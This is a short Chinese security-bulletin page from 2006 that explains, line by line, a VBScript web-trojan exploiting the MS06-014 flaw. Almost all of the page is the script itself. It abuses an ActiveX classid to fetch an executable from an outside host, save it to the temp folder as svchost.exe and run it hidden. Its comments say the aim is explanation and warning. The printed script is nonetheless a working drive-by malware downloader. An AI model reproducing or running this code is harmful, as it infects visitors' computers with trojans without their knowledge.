| MS06014网马脚本解释 |
|
| 作者:佚名 来源:本站原创
点击: 更新时间:2006-12-30 15:48:41 【字体:小
大】 |
Set df = document.createElement("object") '创建项目
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" '对项目进行36位全球唯一码编号
Set x = df.CreateObject("Microsoft.XMLHTTP,"") '创建一个XMLHTTP项目(用来传输数据)
set SS = df.createobject("ADODB.Stream","") '创建一个ADOBD数据流格式(数据媒介)
SS.type = 1 '类型.1好像是2进制.具体忘了
x.Open Get, "http://fxfqia2o.com/laopo/1.exe", False '打开远程文件,这个就是木马文件了
x.Send '发送
set F = df.createobject("Scripting.FileSystemObject","") '创建一个文件项目(用来把数据流还原成文件)
set tmp = F.GetSpecialFolder(2) '这句好像是获得文件夹
SS.open ''
fname1= F.BuildPath(tmp,"svchost.exe") '注入到svchost.exe
SS.write x.responseBody '把远程文件写入数据流中
SS.savetofile fname1,2 '把数据流存为文件.并且是直接写到svchost.exe的Hook好像,到这里.你的机器已经中毒
set Q = df.createobject(Shell.Application,"") '创建一个Shell
Q.ShellExecute fname1,"","","open",0 '到这里.你的病毒开始发挥作用
|
| 安全公告录入:ls1238 责任编辑:ls1238
|
|
上一个安全公告: 监视天堂网游窗口并盗取帐号的木马
下一个安全公告: 上网用户小心近期谨防QQ钓鱼攻击 |
| 【字体:小
大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】
|
网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)